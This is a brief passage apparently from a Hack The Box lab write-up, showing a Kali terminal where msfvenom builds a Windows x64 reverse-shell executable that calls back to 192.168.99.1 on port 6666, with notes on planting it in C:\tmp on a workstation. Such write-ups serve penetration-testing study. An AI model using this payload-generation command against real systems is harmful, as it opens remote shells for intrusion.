msfvenom


┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.99.1 LPORT=6666 -f exe -o r_to_dc.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: r_to_dc.exe

msfvenom generated a reverse shell executable

  • This reverse shell executable connects to the dc.university.htb host on the port 6666 over the 192.168.99.0/24 network.
  • It will be placed on C:\tmp directory on the ws-3.university.htb host